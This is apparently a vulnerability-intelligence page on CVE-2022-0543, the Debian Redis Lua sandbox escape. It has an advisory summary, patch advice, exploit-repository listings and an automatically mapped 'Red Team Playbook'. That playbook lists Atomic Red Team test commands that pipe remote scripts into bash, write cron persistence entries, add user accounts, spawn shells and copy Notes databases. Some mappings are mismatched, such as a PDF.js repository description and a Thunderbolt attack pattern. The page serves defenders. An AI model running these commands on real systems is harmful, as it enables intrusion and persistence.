CVE-2022-0543
Overview
This vulnerability is a sandbox escape in the Lua scripting environment embedded within the Debian-packaged Redis server. The root cause is an insufficient sanitization of the Lua environment by the Debian and Ubuntu Redis packages, which fails to disable or restrict the package interface properly. This flaw affects the Lua sandbox component of the Redis server, allowing unauthorized Lua code to break out of its restricted context.
Vulnerability Description
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
Impact
An unauthenticated remote attacker can execute arbitrary code on the affected Redis server by escaping the Lua sandbox. This enables full system compromise, including unauthorized data access, modification, and potential lateral movement within the network. No user interaction or credentials are required for exploitation, making it a critical risk for exposed Redis instances running the vulnerable Debian package.
Solution
Apply the security update provided in Debian Security Advisory DSA-5081, which addresses the Lua sandbox escape in the Debian Redis package. Detailed patch instructions and version updates are available at https://www.debian.org/security/2022/dsa-5081. Users should upgrade to the fixed Redis package version as specified in the advisory to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Redis key-value database stems from a packaging issue that allows for a Lua sandbox escape, particularly in Debian-based systems. Redis utilizes Lua scripting to enhance its functionality, enabling users to execute scripts for various operations. However, the sandboxing mechanism intended to isolate these scripts from the underlying system is flawed due to the way the software is packaged. This flaw allows an attacker to execute arbitrary code on the host system, effectively bypassing the security measures that should confine the execution environment of Lua scripts. The implications of this vulnerability are severe, as it grants unauthorized access to the system, potentially leading to full control over the affected server.
Exploitation of this vulnerability can occur through several attack vectors. An attacker with the ability to send commands to the Redis server can inject malicious Lua scripts. This is particularly concerning in environments where Redis is exposed to the internet or is accessible by untrusted users. Once the attacker successfully executes a crafted script, they can leverage the permissions of the Redis process to execute arbitrary commands on the host system. This could include installing malware, exfiltrating sensitive data, or pivoting to other systems within the network. The ease of executing such an attack, combined with the high privileges typically granted to Redis, makes this vulnerability particularly attractive to malicious actors.
The real-world impact of this vulnerability is profound, especially for organizations that rely on Redis for critical data storage and processing. A successful exploitation could lead to significant business risks, including data breaches, loss of intellectual property, and disruption of services. For businesses that handle sensitive information, such as financial data or personal identifiable information, the consequences could extend to regulatory fines and reputational damage. Additionally, the potential for lateral movement within a network means that an attacker could compromise not just the Redis instance but also other interconnected systems, amplifying the overall risk to the organization.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, it is crucial to ensure that Redis instances are not exposed to the internet and are only accessible through secure, trusted networks. Employing firewalls and network segmentation can help limit exposure. Furthermore, organizations should regularly update their Redis installations to the latest versions, which may include patches addressing this vulnerability. Implementing strict access controls and monitoring for unusual activity can also aid in early detection of potential exploitation attempts. Additionally, organizations should consider employing intrusion detection systems that can identify anomalous behavior indicative of an attempted Lua script injection.
In conclusion, the vulnerability within the Redis database presents a significant threat to organizations that utilize this technology. The potential for remote code execution through a Lua sandbox escape highlights the importance of secure software packaging and the need for robust security measures. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities. Proactive detection and mitigation strategies are essential to safeguard systems and protect sensitive data from malicious actors.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2022-0543, evidenced by the emergence of new proof-of-concept tools circulating publicly. This development indicates that threat actors are increasingly equipped to leverage the Debian-specific Redis Lua sandbox escape vulnerability for remote code execution. Our telemetry reveals a sharp uptick in detection events, signaling a shift from theoretical risk to active exploitation attempts in the wild. The availability of multiple exploitation frameworks lowers the technical barrier for adversaries, potentially broadening the attacker base beyond highly skilled operators. Consequently, the threat landscape has evolved from a contained packaging flaw to a more immediate operational concern. While ransomware usage linked to this vulnerability remains unconfirmed, the increased exploitation capacity elevates the risk of unauthorized system compromise and lateral movement within affected environments. This escalation warrants heightened vigilance as the vulnerability’s critical severity is now matched by tangible exploitation momentum, thereby increasing the overall threat level to organizations relying on Debian Redis deployments.
Update 2 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2022-0543, accompanied by the emergence of several new proof-of-concept tools that lower the technical barrier for attackers. This development signals a broadening of the exploit landscape beyond initial niche use, increasing the likelihood of opportunistic and less sophisticated threat actors attempting to leverage this vulnerability. Our telemetry indicates that these new tools are gaining traction within underground communities, which may accelerate weaponization and integration into automated attack frameworks. Although ransomware deployment linked to this vulnerability remains unconfirmed, the expanded availability of exploitation resources significantly elevates the risk of unauthorized access and lateral movement within Debian Redis environments. Consequently, the threat level has shifted from a primarily theoretical concern to a more immediate operational risk, warranting increased monitoring and prioritization in defensive postures.
Update 3 — June 19, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2022-0543, accompanied by a rising trend in associated telemetry signals. This increase correlates with a near-maximal EPSS score, reflecting heightened attacker interest and growing confidence in the vulnerability’s exploitability. Concurrently, several new proof-of-concept exploits have surfaced on public repositories, enhancing accessibility for threat actors and potentially accelerating weaponization cycles. Although ransomware deployment linked to this vulnerability remains unconfirmed, the proliferation of exploitation tools and the uptick in detection activity indicate a shift toward more active exploitation phases. For defenders, this evolving landscape underscores an elevated operational risk, particularly within Debian Redis deployments, necessitating intensified monitoring to detect and respond to potential incursions promptly. Overall, the threat level has escalated from a theoretical concern to an imminent threat vector with increased likelihood of successful compromise.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Redis | Redis | N/A |
cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Redis Lua Sandbox Escape
exploits/linux/redis/redis_debian_sandbox_escape
|
Reginaldo Silva, jbaines-r7 | Unknown | - | View |
GitHub PoCs (8)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
0x7eTeam/CVE-2022-0543
CVE-2022-0543_RCE,Redis Lua沙盒绕过 命令执行
|
0x7eTeam | 96 | 36 | 2022-03-16 | View |
|
z92g/CVE-2022-0543
Redis 沙盒逃逸(CVE-2022-0543)POC&EXP
|
z92g | 24 | 10 | 2022-07-06 | View |
|
SiennaSkies/redisHack
redis未授权、redis_CVE-2022-0543检测利用二合一脚本
|
SiennaSkies | 4 | 1 | 2023-05-10 | View |
|
OpsCipher/CVE-2022-0543
Redis RCE through Lua Sandbox Escape vulnerability
|
OpsCipher | 1 | 3 | 2022-09-05 | View |
|
abramas/CVE-2022-0543
Redis RCE through Lua Sandbox Escape vulnerability
|
abramas | 0 | 3 | 2022-09-05 | View |
|
K3ysTr0K3R/CVE-2022-0543
PoC for CVE-2022-0543 – Redis Remote Code Execution (RCE)
|
K3ysTr0K3R | 0 | 0 | 2026-06-19 | View |
|
John-Popovici/CVE-2022-0543-redis-sandbox-escape
A proof of concept and analysis of CVE-2024-4367, the PDF.js arbitrary javascript execution exploit
|
John-Popovici | 0 | 0 | 2026-03-08 | View |
|
netw0rk7/CVE-2022-0543-Home-Lab
CVE-2022-0543 - Redis RCE Vulnerability home lab for Red Teaming, Penetration Testing Training with just one DOCKER
|
netw0rk7 | 0 | 0 | 2025-11-18 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
40%
|
Low | Very High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}"
$fileExtensions = $fileExtensionsString -split ", "
New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null
Function Search-Files {
param (
[string]$directory
)
$files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
$fileExtensions -contains $_.Extension.ToLower()
}
return $files
}
$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
$foundFilePaths = $foundFiles.FullName
Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"
Write-Host "Zip file created: $outputZip\data.zip"
} else {
Write-Host "No files found with the specified extensions."
}
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-0543 |
| bugs.debian.org |
GitHub CVE
x_refsource_MISC
|
https://bugs.debian.org/1005787 |
| ubercomp.com |
GitHub CVE
x_refsource_MISC
|
https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce |
| lists.debian.org |
GitHub CVE
mailing-list
x_refsource_MLIST
|
https://lists.debian.org/debian-security-announce/2022/msg00048.html |
| debian.org |
GitHub CVE
vendor-advisory
x_refsource_DEBIAN
|
https://www.debian.org/security/2022/dsa-5081 |
| security.netapp.com |
GitHub CVE
x_refsource_CONFIRM
|
https://security.netapp.com/advisory/ntap-20220331-0004/ |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/166885/Redis-Lua-Sandbox-Escape.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-0543 |